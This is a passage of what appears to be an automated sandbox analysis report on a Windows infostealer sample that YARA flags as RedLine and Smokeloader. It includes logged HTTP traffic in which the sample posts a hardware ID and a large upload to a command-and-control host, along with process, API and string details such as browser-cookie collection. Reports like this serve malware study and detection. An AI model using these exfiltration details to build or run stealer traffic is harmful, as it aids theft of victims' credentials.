                                                  2024-04-24 23:59:58 UTC1412OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:58 UTC | 806 bytes | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:58 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=vvn02g9rdfvan5qmpuf4coois9; expires=Sun, 18-Aug-2024 17:46:37 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3WPY7iLCUHYqtvUrXRcHS5XFXp631Fcva20PQ1d4kNiwtHVBAT4Ad5kl9V2Pw7%2BzF%2FlAE1iwZSiMP2wZh7iTtIx8TeibfbRAHF6xXtAqxmnQ4NUrHkTLjibt61g0BSepwRDXLzLWHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cd66dc744f9-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:58 UTC | 23 bytes | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:58 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  7 | 192.168.2.4 | 49737 | 172.67.163.209 | 443 | 6856 | C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-04-24 23:59:59 UTC | 287 bytes | OUT | POST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 574078
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: 3d 4d aa 91 2a ee 8c 59 8e 30 6d 7a 5d 99 59 ef 46 0d bb 8d 0e c5 23 64 21 aa 09 bd c4 28 e5 72 91 67 ee e7 c7 9e 84 1f 13 aa ec 36 d5 9c 60 55 56 dc e7 d0 c3 e5 5f 7d 99 fa 2d 8a c5 67 1c 74 c1 a2 74 4f 56 46 dc e5 7f bc 3e 55 10 92 85 d4 13 6f 1a a0 7d b4 bb 53 d4 1d 61 b6 be 6f a1 dd b5 1c 2f 4c 32 d7 a2 ef d1 ff ea 3f 5c ed 4f ba 6b 65 01 65 ea 22 54 e5 46 f5 6b 60 a9 16 1d e3 33 b9 08 e3 b3 3c e8 d7 85 ec e7 26 ff e8 70 3c ee cb 4b 04 7c 24 67 38 41 77 54 67 c9 6d 91 87 14 72 89 49 c1 5e 79 67 1c f9 f1 be 12 e4 b5 eb c3 b1 49 f8 ed 76 ae e2 58 5c 60 d8 c5 f5 70 df 63 a1 bb 59 ce ff 48 15 d4 d5 19 a3 02 26 88 05 98 22 a1 6a 8f 81 14 88 51 0d 95 89 e3 8e 34 33 f2 dd 81 19 7b a8 7c ba 68 f9 e3 fc 2a 48 3e c0 24 b0 10 0f b4 58 16 44 64 18 5e 83 75 3f 54
                                                  Data Ascii: =M*Y0mz]YF#d!(rg6`UV_}-gttOVF>Uo}Sao/L2?\Okee"TFk`3<&p<K|$g8AwTgmrI^ygIvX\`pcYH&"jQ43{|h*H>$XDd^u?T
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: ad d5 33 b8 a6 52 66 eb 58 45 a5 53 b4 1c 76 c1 6d 67 a2 70 57 ac c6 e7 f1 92 63 51 6d 44 9a 7a ef 4d 13 17 d6 4e cf a3 a7 24 d5 13 96 d7 03 4e db 34 1d ce 13 fd 72 81 da 54 55 99 cd 4c 6a 9d d4 61 5b e2 05 16 15 72 87 63 7d 8f 45 f2 41 93 3b 46 f5 02 be b1 45 30 3f 06 b2 67 6b 2a c7 54 28 be 5b c3 66 ce 19 fe 1b b3 13 bc dc dd 15 f3 ee cf 2e d8 23 fb be 2d 76 13 5b b0 1f fd e9 e6 7a cd ec 1f a1 dc be 96 35 f6 42 88 ef f4 13 47 4a 8b 17 a1 4e 26 31 e4 76 eb a2 a6 e7 a8 1b b5 4e af 31 58 9a 73 ee 63 26 e2 18 69 48 3c 45 d2 95 bf f4 74 5d 2a fa 8b ff c6 b8 37 c0 aa c7 fc 10 8c 66 78 62 0f be 3e 79 24 a3 05 8a ff 7c 5b 5c e2 46 a4 ba a2 63 b3 8e 94 37 4f 78 c7 14 67 d5 a0 2c 29 e3 f1 55 92 ca 9a 65 5b 8c 77 02 ef 07 1f ee 23 59 3e 32 45 f5 8b 8b c6 e7 1f c2
                                                  Data Ascii: 3RfXESvmgpWcQmDzMN$N4rTULja[rc}EA;FE0?gk*T([f.#-v[z5BGJN&1vN1Xsc&iH<Et]*7fxb>y$|[\Fc7Oxg,)Ue[w#Y>2E
                                                  2024-04-24 23:59:59 UTC15331OUTData Raw: a8 70 bc 89 18 49 9a 29 ec 78 10 7b 87 fa e8 c9 4d 2d 33 55 97 60 67 bb c7 6a 99 aa 62 c6 60 6a 55 a2 ef 56 a8 eb a0 bb c3 8f e3 de 33 8c 34 69 fb 95 78 4c 12 02 7c fc 6d 57 e5 32 65 aa 0e 1b 22 33 ef 62 b6 ca 63 df 88 e3 f6 99 a1 e9 eb c1 6a 32 c7 be 11 97 9e 4a 0f 1e 00 71 d8 02 84 69 00 d2 dc 11 fb 4b 35 ec d7 c2 b9 4f 78 b3 0c 43 51 cc e2 f1 eb 12 2b 5d 5d e1 25 96 69 f4 5d 28 25 dc 4e 38 0e 3c 42 92 8e d8 6e 4c 55 78 bc f7 f4 76 ed 1f 74 0a af fc 57 81 46 4a 59 ac 7f 2f 55 3c 4a 75 63 3c f9 b7 de 6d 30 b5 67 a1 d3 51 54 84 32 e4 3e 93 8e bc fe f5 91 25 05 5c fb d6 f6 a4 60 a4 71 4f 51 ce 95 bb 2f 5a 2e 5a 7e 9a 99 e1 8d cd 7e b1 ba fc b6 9c 0a 5d f8 5e 5e 43 b4 70 af 34 9d 1d ca 35 58 ad 71 d5 10 7e fe 7e 19 ce aa 5e 03 dd 85 6b b3 9c 8e 5d b9 43 5c
                                                  2024-04-25 00:00:01 UTC808INHTTP/1.1 200 OK
                                                  Date: Thu, 25 Apr 2024 00:00:01 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=teuilkfbarphnvlg5kckkba48l; expires=Sun, 18-Aug-2024 17:46:40 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5f%2B53fdA3SA0wbo9IsGKwyNU3ij0LU2luKL5fC6VWgeltR0t5HZpbLc6XM6%2BVtnjKtWViSSvzDXeCNOk9ZFDyx%2BJrTEL5alWgId4XRGeHoWDFxLoX6N1xBwLR1nxGs97sK4h2DRj5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cde9901b050-ATL
                                                  alt-svc: h3=":443"; ma=86400



                                                  Target ID:0
                                                  Start time:01:59:50
                                                  Start date:25/04/2024
                                                  Path:C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\o7b91j8vnJ.exe"
                                                  Imagebase:0x400000
                                                  File size:360'960 bytes
                                                  MD5 hash:7B3E62BCBEED62A180220669F6A0C548
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:02:00:00
                                                  Start date:25/04/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6856 -s 1516
                                                  Imagebase:0x880000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:8.3%
                                                    Dynamic/Decrypted Code Coverage:8.2%
                                                    Signature Coverage:25.8%
                                                    Total number of Nodes:376
                                                    Total number of Limit Nodes:19
                                                    APIs
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D77D
                                                    • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D7A8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentExpandStrings
                                                    • String ID: -^$AV$SE$X&$[info] collected cookies file of the chromium-based browser$onqp$onqp
                                                    • API String ID: 237503144-3553015444
                                                    • Opcode ID: c3e7ce5279bbfde57a6df063cb837e0ba5410395dca0e577725f3cf45325333f
                                                    • Instruction ID: 03b20d697cc4d4ceda3fd1ee009f6e38ade5153744173ede794293296183730d
                                                    • Opcode Fuzzy Hash: c3e7ce5279bbfde57a6df063cb837e0ba5410395dca0e577725f3cf45325333f
                                                    • Instruction Fuzzy Hash: F4829A79608341CFE314CF18D89076BB7E2FB8A314F198A2DE4959B3A1D778D845CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
                                                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424618
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID: +u7$Z8J*
                                                    • API String ID: 3545744682-3577212644
                                                    • Opcode ID: d0736012eb11d93e8aac0e09047d21296bc7183f2b0db3f091fb775f2bcfc723
                                                    • Instruction ID: 165055785b86ff1ff65636ea23ef9f62a0f191231776936cceeb048ae6667778
                                                    • Opcode Fuzzy Hash: d0736012eb11d93e8aac0e09047d21296bc7183f2b0db3f091fb775f2bcfc723
                                                    • Instruction Fuzzy Hash: 10328E70244B528AD729CB34D464BE3BBE1EF57308F484A6DD0FB8B682D778A406CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
                                                    • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00424618
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID: P6D/
                                                    • API String ID: 3545744682-4117495492
                                                    • Opcode ID: 98d58fd9a2d5d080cfad4b43f2320fd71802cce227eaca84e7705199bef4817b
                                                    • Instruction ID: 24e67b7c81de9a4d5bd346c315e300abd70e7ef5a1aa41be01d77cb8b643429b
                                                    • Opcode Fuzzy Hash: 98d58fd9a2d5d080cfad4b43f2320fd71802cce227eaca84e7705199bef4817b
                                                    • Instruction Fuzzy Hash: 0F328D70204B928AD726CB34D494BE3BBE1EF57309F48496DD0FB8B282C7796446CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    Control-flow graph (rendered graph not reproduced; executed / not-executed colouring not recoverable): basic blocks 424087-424aef; calls 408700, 408770, 429680, 438070 and GetComputerNameExA.
                                                    APIs
                                                    • GetComputerNameExA.KERNELBASE(00000006,?,00000200), ref: 0042451D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: ComputerName
                                                    • String ID: P6D/
                                                    • API String ID: 3545744682-4117495492
                                                    • Opcode ID: abb45cfd1665ca00273ef3f1b0106a62f4ffe98293d26439ae483960b4f7641a
                                                    • Instruction ID: 368cbe518a004d91c844a8922d65ddcbde3b63ca03ed0cce2041834018fe7c5f
                                                    • Opcode Fuzzy Hash: abb45cfd1665ca00273ef3f1b0106a62f4ffe98293d26439ae483960b4f7641a
                                                    • Instruction Fuzzy Hash: B9329B70604B528AD726CF34D8A4BE3BBE1EF56308F48496DD0FB8B282C7796446CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    Control-flow graph (rendered graph not reproduced; executed / not-executed colouring not recoverable): basic blocks 404740-404e05; calls 402fd0, 4086f0, 408700, 408710 and 408770.
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )$IDAT$IEND$IHDR
                                                    • API String ID: 0-3181356877
                                                    • Opcode ID: fa1dcc08f83669751d98c45a89e33dd5cfaf22a636ecbc88bdf53c252e0362d9
                                                    • Instruction ID: 616d1399deee0a63aede7b3c3a380fc91103d69987d9aa92d37846ddb7d7f5fd
                                                    • Opcode Fuzzy Hash: fa1dcc08f83669751d98c45a89e33dd5cfaf22a636ecbc88bdf53c252e0362d9
                                                    • Instruction Fuzzy Hash: 6312EFB1A083448FD714CF29DC9076A7BE1EF85304F04857EEA849B392D779D909CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: x
                                                    • API String ID: 0-2363233923
                                                    • Opcode ID: ad05adff6cc53639aa453a7d6789a5a507c4f618ea68bd813a2b9754d8c9e1cc
                                                    • Instruction ID: 5e393febd6900f2cd60b323e8f13313b4837cbc21583559a6409e5a725ef4311
                                                    • Opcode Fuzzy Hash: ad05adff6cc53639aa453a7d6789a5a507c4f618ea68bd813a2b9754d8c9e1cc
                                                    • Instruction Fuzzy Hash: D071A1B15087818BD324CF24C49179BFBE1AFD5344F04892EE5D987382D639D949CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 04265BFE
                                                    • Module32First.KERNEL32(00000000,00000224), ref: 04265C1E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1845056806.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4265000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateFirstModule32SnapshotToolhelp32
                                                    • String ID:
                                                    • API String ID: 3833638111-0
                                                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction ID: fe2ff150ffcf860bdd503148628e16cec70f7c1bf99ba9151d6964acf43553ff
                                                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                    • Instruction Fuzzy Hash: A1F06231210711BBE7203AB9A88DB6E76ECAF49625F140568E647954C0DA70F8C54A61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: onqp$F
                                                    • API String ID: 0-3477909023
                                                    • Opcode ID: 4dcbbf2a890ac3d374c1d3c84672f60673a4bb6946c2af3232e750e31ec7147f
                                                    • Instruction ID: 63a37f33c9773b82383deb7d5d266ebc64ff0dd11a4c80cef5b7f70997e62e81
                                                    • Opcode Fuzzy Hash: 4dcbbf2a890ac3d374c1d3c84672f60673a4bb6946c2af3232e750e31ec7147f
                                                    • Instruction Fuzzy Hash: 3121A3B96183418FD72CCF04D5A07BFB7E2AFC6708F54182DE9824B381C77998418B8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: onqp
                                                    • API String ID: 0-1718216680
                                                    • Opcode ID: 074eb67a0e8625aa10ebf4850d1ba4eb172be33119ae63f38b080a0c1684276f
                                                    • Instruction ID: 443a94687d516e7fce39df943a97d10845015d358397bdc9878ab89e8d70c56d
                                                    • Opcode Fuzzy Hash: 074eb67a0e8625aa10ebf4850d1ba4eb172be33119ae63f38b080a0c1684276f
                                                    • Instruction Fuzzy Hash: AAA1FFB16443018BD714EF14CCA1BABB3E1FF95724F18491EE49287391E378E991CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LdrInitializeThunk.NTDLL(00438D36,005C003F,00000006,?,?,00000018,82818087,?,ZKA), ref: 00433CED
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                    • Instruction ID: c1b3d4492825e51a2129b00b8cd86cf652684bda125d9e4c8d1b0ba6372c1005
                                                    • Opcode Fuzzy Hash: 8bfd55fa9a3783dde79afca9779d4b7cf76278c514d5c7b39b661a11ebe4b8a8
                                                    • Instruction Fuzzy Hash: 74E0B675508212EBDA05DF45C14051FF7E2BFC4B14F55C88EE88433204C7B8AD45DB42
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: E&eb
                                                    • API String ID: 0-175690455
                                                    • Opcode ID: e98a84fdc1d20ca021328a73e32aeb666d55a0fa0048f113b6151455cacfdda1
                                                    • Instruction ID: b8f5a8e3dcf807d80dac774d48860337069215117526bb8331fba5c9a38cef06
                                                    • Opcode Fuzzy Hash: e98a84fdc1d20ca021328a73e32aeb666d55a0fa0048f113b6151455cacfdda1
                                                    • Instruction Fuzzy Hash: D931B1B1600B018BC725DF75C881AA7B3E2EF89314F18892DD0AAC7791E739F5818744
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ab880d36f1e3ef79f070558864189974e201650b2fc4a9b0b2b78b6896b3a233
                                                    • Instruction ID: 33964663c1c25b7ce45e863f8a9a155cb930722d678f5f3125d4410b750ac910
                                                    • Opcode Fuzzy Hash: ab880d36f1e3ef79f070558864189974e201650b2fc4a9b0b2b78b6896b3a233
                                                    • Instruction Fuzzy Hash: C0E168B8600B018FD328CF25D994B27B7E5FB49308F84492DE49687B62E778F845CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2cc86ad9dbefa929339bcf13688f90508a10795336458aca2642d26268c973c2
                                                    • Instruction ID: cfdd1eac7a752c9895d8910292a9cdf1f7f4ab7debb0d412fb0fa544ba69e460
                                                    • Opcode Fuzzy Hash: 2cc86ad9dbefa929339bcf13688f90508a10795336458aca2642d26268c973c2
                                                    • Instruction Fuzzy Hash: E3C1E2B1B083518FD314CF18D89072BB7E1EB95318F65492EF49587392E379D845CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc7d688c4800d7467e5dec71b2816dc21eadf218d5a55f189bb6d84b232167a9
                                                    • Instruction ID: 2ad7af327792f261ff722e5f1da2ed22df55520e29869c472b0f36c5ca345de1
                                                    • Opcode Fuzzy Hash: dc7d688c4800d7467e5dec71b2816dc21eadf218d5a55f189bb6d84b232167a9
                                                    • Instruction Fuzzy Hash: E6A18A74600B018FE728CF25C994B17B7E1FB49304F14896DE5AA8BB91D779F905CB88
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7e0e2ec75268ac31b636375ce83739fad1511776ca76e724a2cd0e06c5c1aa90
                                                    • Instruction ID: be2f659581eec67e65d3233d53e9a8afebf0bf0bc19166d434e5d2f0596eea41
                                                    • Opcode Fuzzy Hash: 7e0e2ec75268ac31b636375ce83739fad1511776ca76e724a2cd0e06c5c1aa90
                                                    • Instruction Fuzzy Hash: C881BD70A083029BE314CF14C494B2BBBE1FB89759F64991DF4855B392D378DE45CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
